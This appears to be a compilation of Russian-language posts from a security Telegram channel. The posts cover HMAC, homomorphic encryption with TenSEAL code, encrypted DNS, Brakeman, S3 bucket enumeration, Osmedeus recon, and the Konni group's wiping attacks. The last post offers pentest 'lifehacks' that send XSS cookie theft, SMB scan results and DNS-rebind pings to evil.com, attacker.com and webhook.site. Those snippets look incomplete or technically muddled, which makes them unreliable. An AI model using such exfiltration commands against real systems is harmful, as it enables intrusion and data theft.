📝Как работает HMAC

HMAC (Hash-based Message Authentication Code) - по сути механизм, который позволяет проверить, что сообщение не изменялось и действительно пришло от доверенного отправителя.

Вот как по этапам 👇

1️⃣Алиса хочет отправить документ Дэну. Они оба заранее знают один и тот же секретный ключ (secret key).

2️⃣Алиса применяет хэширование к документу, добавив этот секретный ключ.
Результат — это MAC (Message Authentication Code), уникальный код, зависящий и от документа, и от ключа.

3️⃣Алиса прикрепляет MAC к документу

4️⃣Документ отправляется Дэну

5️⃣Дэн делает то же самое: берёт полученный документ, использует свой (тот же) секретный ключ и вычисляет собственный MAC.

6️⃣Сравнение: если MAC, полученный от Алисы, совпадает с вычисленным у Дэна - значит, документ аутентичен и не был изменён при передаче.

ZeroDay | #атака

Гомоморфное шифрование: что это?

👋 Приветствую в мире цифровой безопасности!

Расскажу, что такое гомоморфное шифрование и как его используют.

⏺В обычной криптографии, чтобы что-то посчитать, данные нужно сначала расшифровать. А гомоморфное шифрование делает возможным вычисления прямо «внутри шифра».

Например:

Enc(5) + Enc(3) = Enc(8)

Никто не знает, что там было 5 и 3, но результат всё равно корректен. Расшифровка даст тот же результат, будто бы всё считали с открытыми числами.

⏺Типы гомоморфных схем

1️⃣PHE (Partially Homomorphic) — поддерживает одну операцию, например сложение (Paillier) или умножение (RSA).
2️⃣SHE (Somewhat Homomorphic) — поддерживает несколько операций, но ограниченное количество.
3️⃣FHE (Fully Homomorphic) — полная версия, где можно делать любые вычисления, сколько угодно раз.

Главная проблема — «шум» в зашифрованных данных, который растёт при каждом вычислении.

⏺Bootstrapping - магия самоочистки: Каждая операция добавляет помехи, и через десятки вычислений сообщение становится нечитаемым.
Bootstrapping решает это: он как бы «гомоморфно расшифровывает» зашифрованный текст,
очищая его от шума, не зная исходного ключа.

⏺Популярные схемы:

• BFV (Brakerski–Fan–Vercauteren) — точная арифметика над целыми числами, база Microsoft SEAL.
• BGV — снижает шум за счёт модульных сокращений.
• CKKS — работает с приближенными числами, подходит для ML и аналитики.
• TFHE — булева логика, очень быстрый bootstrapping.

⏺В чем главная фишка: FHE решает главную дилемму приватности: данные остаются зашифрованы на всём пути - от клиента до сервера и обратно. Облако может вычислить сумму зарплат, медиану возраста или результат модели,
но не узнает ничего о самих данных.

⏺Но есть и проблемка - скорость. Обычное вычисление, которое занимает миллисекунду, в FHE может длиться вообще минуты.

Как решить:

➡️BASALISC и REED — аппаратные ускорители для FHE, дают до 100× ускорения.
➡️FPGA и GPU-реализации делают технологию ближе к практике.
➡️Microsoft, IBM, Google уже тестируют прототипы FHE-облаков.

ZeroDay | #шифрование

Как использовать гомоморфное шифрование?

👋 Приветствую в мире цифровой безопасности!

Сегодня попробуем выполнить вычисления над зашифрованными данными с помощью Python и библиотеки TenSEAL.

⏺Как установить: TenSEAL основан на Microsoft SEAL и поддерживает схемы CKKS (плавающая арифметика) и BFV (целые числа).

Установим библиотеку:

pip install tenseal

Импортируем:

import tenseal as ts

Создаём контекст шифрования (здесь используется схема CKKS):

context = ts.context(
    ts.SCHEME_TYPE.CKKS,
    poly_modulus_degree=8192,
    coeff_mod_bit_sizes=[60, 40, 40, 60]
)
context.generate_galois_keys()
context.global_scale = 2**40

⏺Шифруем данные: Предположим, у нас есть массив с приватными значениями:

data = [5.0, 3.0, 2.0]
enc_data = ts.ckks_vector(context, data)

И вот теперь enc_data - это зашифрованный вектор. Мы не можем прочитать его содержимое, но можем с ним считать.

⏺Выполним арифметические операции прямо над зашифрованными данными:

enc_result = enc_data + 10
enc_result = enc_result * 2

И даже можем делать сложение векторов:

enc_sum = enc_data + enc_data

⏺Расшифровка результата

На стороне клиента (у кого есть ключ):

result = enc_result.decrypt()
print(result)

Результат будет:

[30.0, 26.0, 24.0]

Хотя сервер выполнял операции, он не видел исходных чисел.

ZeroDay | #шифрование

Отец Интернета: 50 лет путешествия Винта Серфа по бескрайнему миру веба

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу о «отце Интернета», Винте Сёрфе, и его 50-летнем пути.

⏺От юности к науке: 15-летний Винт впервые попал в вычислительный центр SAGE и был очарован масштабом компьютеров. В 17 лет он уже писал программы для НАСА для анализа двигателей F-1 миссии «Аполлон». Позже он поступил в Стэнфорд, где увлёкся программированием и не смог стать профессиональным математиком, но зато нашёл свой путь в вычислительных сетях.

⏺Рождение TCP/IP: В 1973 году вместе с Робертом Каном Сёрф придумал протокол, который позволял соединять любые сети без единого центра, повторно отправлять потерянные пакеты и масштабировать Интернет. Идея была проста: данные путешествуют как письма в конвертах через шлюзы, пока не достигнут получателя. Первая коммерческая сеть Telenet появилась уже в 1974 году.

⏺MCI Mail и глобальная почта: Сёрф сделал электронную почту доступной между разными провайдерами. Письма распечатывались локально и доставлялись адресату.

⏺Межпланетный интернет: В 1998 году Сёрф задумался о связи с МКС и дальнейших миссиях: пакеты данных могут «ждать» на ретрансляторах, пока путь не станет доступным. Сегодня его идеи уже применяются для передачи информации между Землёй и космическими станциями.

⏺Современность: В Google он стал главным интернет-евангелистом и соосновал People-Centered Internet, продвигая доступность сети, сокращение цифрового разрыва и использование ИИ для перевода. Главная цель - сделать Интернет полезным и безопасным для всех.

ZeroDay | #история

👋 Приветствую в мире цифровой безопасности! Сегодня расскажу о новой фиче российской нейронки.

Теперь с нейросетью можно говорить, как с живым человеком — задавать вопросы, перебивать в процессе и получать транскрипцию разговора. Функция уже работает в вэбе и на Android в бета-версии.

⏺Мы проверили, как ИИ справляется с реальными вопросами. На запрос «Какие профессии будут востребованы в ближайшие 5–10 лет?» ГигаЧат ответил: «Самые перспективные направления — экология и устойчивое развитие, биотехнологии и здравоохранение, а также сервисы, связанные с комфортом жизни».

⏺Общение получается очень естественным — можно уточнять детали, спорить и развивать тему, как в разговоре с экспертом.
Теперь ГигаЧат не просто отвечает на запросы, а помогает осмысленно смотреть в будущее профессий.

ZeroDay | #ИИ

Жизнь как коробка с печеньками: что скрывают cookie-баннеры

Каждый день вы кликаете «Принять всё» - но что на самом деле принимаете? Cookie-баннеры давно превратились из заботы о приватности в инструмент манипуляции: UX-дизайн, закон и аналитика переплелись в одной кнопке.

⏺В статье расскажут, как появились cookie, зачем их заставили сопровождать баннером, почему от этого страдает статистика и что скрывается за “необходимыми” файлами. Плюс, как сайты отслеживают вас даже без cookies.

ZeroDay | #Статья

Защита приватности: Encrypted DNS

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу, как конкретно зашифрованный DNS защищает нашу приватность и в целом делает интернет безопаснее.

⏺Когда вы вводите адрес сайта, ваше устройство ищет его IP через DNS - это как справочник адресов. Без него пришлось бы запоминать длинные числа вроде 192.0.2.1 для каждого ресурса. DNS работает миллионы раз в день, соединяя вас с сайтами, приложениями и сервисами.

⏺Открытый DNS - «письмо без конверта»: Традиционный DNS отправляет запросы в открытом виде. Провайдер видит, какие сайты вы посещаете, хакеры могут перехватывать и подменять ответы, а государство или цензоры — блокировать ресурсы.

⏺Зашифрованный DNS - буквально«конверт с секретом»: Здесь ваши запросы шифруются протоколами DoH, DoT, DNSCrypt или DoQ. Только ваш компьютер и сервер видят, куда вы заходите. Любые попытки подмены или перехвата данных становятся практически невозможными.

⏺Протоколы шифрования:

➡️DoH (DNS over HTTPS) - маскирует DNS-запросы среди обычного трафика.
➡️DoT (DNS over TLS) - защищает канал, предотвращает подмену.
➡️DNSCrypt - шифрует и подписывает запросы.
➡️DoQ (DNS over QUIC) - быстрый и стабильный вариант для сложных сетей.

⏺Популярные провайдеры: NextDNS, AdGuard DNS, Cloudflare 1.1.1.1 дают возможность легко включить зашифрованный DNS на всех устройствах.

ZeroDay | #DNS

Brakeman: статический сканер для Rails

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Brakeman - статический сканер уязвимостей для Ruby on Rails. Находит SQL‑инъекции, XSS, unsafe mass assignment, command injection и прочие привычные неприятности 😬Приложение запускать не нужно. Brakeman читает исходники и выдаёт готовые артефакты для ревью и CI.

⏺Brakeman парсит Rails‑код, сопоставляет потоки данных и сигнатуры уязвимостей и генерирует понятные отчёты. Самое то для локального скана, nightly‑job или как обязательная проверка в pre‑merge pipeline.

⏺И кстати работает с Rails от 2.3 до 8.x и легко встраивается в CI/CD, один запуск в pipeline и ты видишь все горящие проблемы ещё до мержа. HTML‑отчёт для дев‑ревью, JSON - для автоматизации и триажа.

⏺Ловите самые нужные команды:

# Установка через gem
gem install brakeman

# Быстрый запуск в корне Rails
brakeman

# Скан через Docker (цветной вывод)
docker run -v "$(pwd)":/code presidentbeef/brakeman --color

# HTML-отчёт
brakeman -o brakeman_results.html

# Только высокоуровневые (High) предупреждения
brakeman -w3

# Создать/редактировать список игнорируемых предупреждений
brakeman -I

ZeroDay | #Инструмент

Как быстро найти открытые S3‑бакеты

👋 Приветствую в мире цифровой безопасности!

Сегодня поговорим, как быстро найти открытые Amazon S3-бакеты и проверить их внутрянку.

⏺Открытые S3-бакеты - это частая проблема в облачных средах: иногда компании или команды случайно делают их публичными, и конфиденциальные данные становятся доступными вообще любому.

⏺Скан по URL и поддоменам: юзаем awscli или s3cmd, чтобы понять, доступен ли бакет без авторизации. Shadow-бакеты часто лежат на случайных поддоменах.

aws s3 ls s3://example-bucket --no-sign-request
s3cmd ls s3://example-bucket

⏺Проверяем на публичный доступ: Смотрим, кто может читать файлы. Иногда бакет открыт полностью, а иногда только для конкретных IP.

aws s3api get-bucket-acl --bucket example-bucket
aws s3api get-bucket-policy --bucket example-bucket

⏺Скачивание или выборочная проверка: Если бакет публичный, можно безопасно глянуть содержимое или скачать отдельные файлы для анализа.

aws s3 cp s3://example-bucket/test.txt ./ --no-sign-request
aws s3 sync s3://example-bucket ./local-folder --no-sign-request

ZeroDay | #безопасность

Pentest, Red Team и Bug Bounty: в чем разница?

👋 Приветствую в мире цифровой безопасности!

Вспомним, чем отличаются эти три формата тестирования.

⏺Pentest - это такой контролируемый взлом. Команда проверяет конкретные системы по заранее согласованному плану: ищет уязвимости, доказывает возможность их эксплуатации и даёт отчёт. Нужно для оценки уровня защиты и соблюдения комплаенса.

⏺Red Team - симуляция реального нападения. Тут уже цель не просто найти дыру, а проверить, как компания обнаружит и отреагирует на атаку. Используются социальная инженерия, фишинг, обход SOC. Можно сказать, что здесь уже все реалистичнее, только без ущерба, ясное дело.

⏺Bug Bounty - прямо открытая охота. Компания публикует правила, и исследователи со всего мира ищут уязвимости за вознаграждение. Чем шире охват - тем больше и шанс найти то, что не заметили даже опытные тестеры.

ZeroDay | #безопасность

А кто у вас отвечает за kube-api? Безопасность Kubernetes при помощи CIS Benchmark

Каждый кластер Kubernetes - буквально живой организм: он управляет сервисами, хранит состояние и следит за апками. Но один неверный флаг в kube-apiserver или слабые права на etcd могут превратить его в дыру для данных и процессов.

⏺В статье разобрали, как CIS Benchmark помогает закрыть очевидные уязвимости, какие настройки мастера и etcd стоит мониторить, и на что обратить внимание, чтобы кластер работал на 💯

ZeroDay | #Статья

Osmedeus: автоматизируем рекон

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Osmedeus - workflow‑движок для рекона: собирает подписи, пробегает словари, складывает результаты и масштабируется на аж сотню целей. Идея простая - не выполнять по 100 скриптов вручную.

⏺Супер легко кастомить и масштабировать: свои воркфлоу, свои wordlists, режимы «gentle/aggressive», бэкапы воркспейсов и cron‑запуски.

⏺Для начала установим:

# автоматическая install-скрипт
bash <(curl -fsSL https://raw.githubusercontent.com/osmedeus/osmedeus-base/master/install.sh)

# или сборка из исходников (Go >=1.17)
go install -v github.com/j3ssie/osmedeus@latest

Простой скан (general flow)

osmedeus scan -t sample.com

⏺Исключить модули (например, скриншоты и spider)

osmedeus scan -t sample.com -x screenshot -x spider

Запуск конкретного модуля (content discovery из файла с URL)

osmedeus scan -m content-discovery -t http-file.txt

⏺Настройка скорости, потоков и чанков

osmedeus scan --tactic gently -t sample.com
osmedeus scan --threads-hold=15 -f cidr -t 1.2.3.4/24
osmedeus scan --chunk --chunk-parts 20 -f cidr -t list-of-100-cidr.txt

ZeroDay | #Инструмент

Корейские хакеры удаленно стирали данные с помощью Google Find Hub

👋 Приветствую в мире цифровой безопасности!

Расскажу, как северокорейская группа Konni использовала обычные функции Google, чтобы красть данные и удалять их с устройств жертв.

⏺Что это было: группа Konni (aka Earth Imp, Opal Sleet, Osmium, TA406, Vedalia) рассылала вредоносное ПО под видом приложений для снятия стресса. С помощью фишинговых писем и компрометации ПК они крали учётные данные Google жертв, а затем через Find Hub инициировали удалённую очистку устройств.

⏺Как это было: заражённый ПК оставался под наблюдением более года. Группировка использовала Lilith RAT и EndRAT для шпионажа, управления системой и кражи данных из Google и Naver. Автоматизированные скрипты запускались каждую минуту, выполняя команды на заражённых машинах - от скачивания и загрузки файлов до удаления данных.

⏺Последствия - печальны: люди потеряли личные данные без возможности восстановить их. Хакеры также чистили почту, удаляли уведомления Google и подчищали следы активности, чтобы скрыть свои действия.

⏺Konni использовали Remcos RAT, Quasar RAT и RftRAT, а атаки были ориентированы на корейских пользователей. Google отметил, что уязвимостей в Android или Find Hub не было - атака требовала компрометации ПК и кражи учётных данных.

ZeroDay | #история

3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках при пентесте.

⏺XSS в заголовки через Referer + webhook-лог: проходит через CSP, фиксирует кражу куки/токена без JS.

GET /page HTTP/1.1
Host: target.example.com
Referer: https://evil.com/?xss=



⏺Однострочный SMB-скан с enum4linux-ng + webhook-результат: Быстро собирает шары/юзеров, отправляет на webhook.

enum4linux-ng -A target.example.com | curl -s -X POST https://webhook.site/your-id --data-binary @-



➡️Защита: фильтровать Referer, отключить NTLM где не нужно, мониторить 445/tcp.

⏺DNS-rebind через короткое TTL + webhook-ping: обходит локальные ограничения, подтверждает доступ к internal.

echo "127.0.0.1 target.internal" > /tmp/rebind
curl -s --resolve attacker.com:80:127.0.0.1 https://webhook.site/your-id -d "rebind_success=$(date)"



➡️Защищаемся так: DNS с анти-rebind, проверка Host заголовка, запрет external DNS в internal.

ZeroDay | #пентест